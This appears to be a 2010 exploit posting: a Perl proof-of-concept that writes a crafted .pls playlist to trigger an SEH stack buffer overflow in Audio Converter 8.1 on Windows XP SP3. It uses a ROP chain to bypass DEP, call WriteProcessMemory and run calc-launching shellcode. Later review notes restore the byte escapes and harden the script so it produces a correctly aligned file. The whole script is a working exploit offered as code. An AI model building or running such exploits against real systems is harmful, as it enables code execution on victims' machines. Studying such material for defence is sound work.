audiocoverter-overflow.txt
Posted on 08 June 2010
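#***********************************************************************************
# Exploit Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit ROP/WPM
# Date : 07/06/2010
# Author : Sud0
# Bug found by : chap0
# Software Link : http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html
# Version : 8.1
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : SEH
# Thanks to my wife for her support
# Thanks for chap0 for bringing us the game
# Greetz to: Corelan Security Team
# mr_me you'r killing the ROP bro :)
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Using ROP to bypass DEP protection and call WPM
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#***********************************************************************************
#code :
#
# Review notes (not part of the original header):
#  * The byte-string escapes in this listing were garbled on extraction
#    ("x8BxEC..." instead of "\x8B\xEC..."); as published the script would
#    have written the ASCII text "x8BxEC" into the file, not the bytes.
#    They are restored below, as are the "\n" line endings on the prints.
#  * strict/warnings added; the output file is now opened with a 3-arg
#    lexical open in binary mode. Without binmode, a text-mode handle on
#    Windows rewrites any 0x0A byte in the payload as 0x0D 0x0A, which
#    shifts every offset after it (the SEH record in particular).
#  * "del $filename" via system() is replaced with unlink: no shell, and it
#    works on any OS the .pls file might be generated on.
#  * "B" x (4436 - length($buffer)) silently becomes "" if the chain plus
#    shellcode ever grows past the SEH offset, which puts the SEH handler at
#    the wrong place. The script now dies instead.
#  * The nSize argument handed to WriteProcessMemory is derived from
#    length($shellcode) rather than hard-coded to 0x1A, so swapping in
#    another payload cannot leave the size stale.
#  * Every address below is a fixed, non-rebased pointer: the 0x10xxxxxx
#    gadgets presumably live in an application DLL and 0x7C802213 is the
#    WriteProcessMemory address of the tested XP SP3 EN kernel32. They are
#    only valid for that exact build (TODO confirm module and base).

use strict;
use warnings;

print <<'BANNER';
|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
|                                   http://www.corelan.be:8800     |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|
BANNER
print "[+] Exploit for .... \n";

my $filename = "newaudio.pls";

# Small Shellcode to run calc (26 bytes; nSize below is computed from it).
my $shellcode = "\x8B\xEC\x55\x8B\xEC\x68\x20\x20\x20\x2F\x68\x63\x61\x6C\x63"
              . "\x8D\x45\xF8\x50\xB8\xC7\x93\xC2\x77\xFF\xD0";

# Layout constants as tuned by the author for the tested build.
my $seh_offset    = 4436;   # offset of the SEH handler pointer in the file
my $junk_to_chain = 280;    # filler before the first ROP gadget

# The SEH handler (add esp,878 / retn 8, appended last) pivots the stack back
# into this buffer; the author's filler sizes place the first gadget where that
# pivot lands. The "junk" sizes between gadgets are the author's values and
# depend on that landing point as much as on the gadgets themselves — keep
# them together if anything is moved.
my $buffer = "A" x $junk_to_chain;

# Step 1: eax = ebp, then eax += 0x100 ten times (one explicit gadget plus
# nine in the loop). Per the author's comments this is how the shellcode's
# address is computed; it ends up in eax for step 3.
$buffer .= "\x31\x2A\x00\x10";   # mov eax,ebp / pop ebp / retn4
$buffer .= "B" x 12;             # some junk
$buffer .= "\x1D\xA4\x07\x10";   # add eax,100 / pop ebp / retn
$buffer .= "B" x 8;              # some junk
for (1 .. 9) {
    $buffer .= "\x1D\xA4\x07\x10";   # NEXT : add eax,100 / pop ebp / retn
    $buffer .= "B" x 4;              # some junk
}

# Step 2: edi = address of "ADD ESP,4 / RETN" (popped by the POP EDI gadget),
# then "ADD ESP,14 / RETN" skips the 20 junk bytes (0x14 == 20) to reach the
# writer gadget.
$buffer .= "\x00\x8D\x00\x10";   # POP EDI / RETN
$buffer .= "\xB6\x12\x00\x10";   # ADD ESP,4 / RETN        -> lands in EDI
$buffer .= "\x05\x21\x00\x10";   # ADD ESP,14 / RETN
$buffer .= "B" x 20;             # some junk

# Step 3: store eax (shellcode address) into the WPM lpBuffer slot at
# [esp+0x10], then "call EDI". The call pushes a return address that the
# ADD ESP,4 in EDI discards, so execution returns straight into WPM with the
# five dwords below as its stack frame.
$buffer .= "\x79\x84\x02\x10";   # mov dword ptr ss:[esp + 10], eax / call EDI
$buffer .= "\x13\x22\x80\x7C";   # @ of WPM (WriteProcessMemory, kernel32, XP SP3 EN)
$buffer .= "\xFF\xFF\xFF\xFF";   # RET after WPM choose one and use it
                                 # (0xFFFFFFFF is not a valid return target; the
                                 #  author's note implies it is deliberately a
                                 #  don't-care — TODO confirm how control reaches
                                 #  the copied shellcode)
$buffer .= "\xFF\xFF\xFF\xFF";   # hProcess = -1 : means process itself
$buffer .= "\xCF\x22\x80\x7C";   # lpBaseAddress : Destination address
$buffer .= "B" x 4;              # lpBuffer : some junk, @ of shellcode will land here
$buffer .= pack("V", length($shellcode));   # nSize (0x1A for the calc payload)
$buffer .= "\x00\xA0\x45\x00";   # lpNumberOfBytesWritten : Writeable memory
$buffer .= "B" x 12;             # some junk
$buffer .= $shellcode;

# Pad up to the SEH record. Refuse to continue if the chain has outgrown the
# offset rather than silently emitting a mis-aligned file.
my $pad = $seh_offset - length($buffer);
die sprintf("chain + shellcode is %d bytes, past the SEH offset %d\n",
            length($buffer), $seh_offset) if $pad < 0;
$buffer .= "B" x $pad;           # some junk
$buffer .= "\x2F\x37\x01\x10";   # SEH : add esp, 878 / retn 8
$buffer .= "A" x 10000;          # some junk

if (-e $filename) {
    print "Removing old $filename file\n";
    unlink $filename or die "unlink $filename: $!\n";
}
print "Creating new $filename file\n";
open(my $fh, '>', $filename) or die "open $filename: $!\n";
binmode($fh);                    # raw bytes: no CRLF translation of the payload
print {$fh} $buffer;
close($fh) or die "close $filename: $!\n";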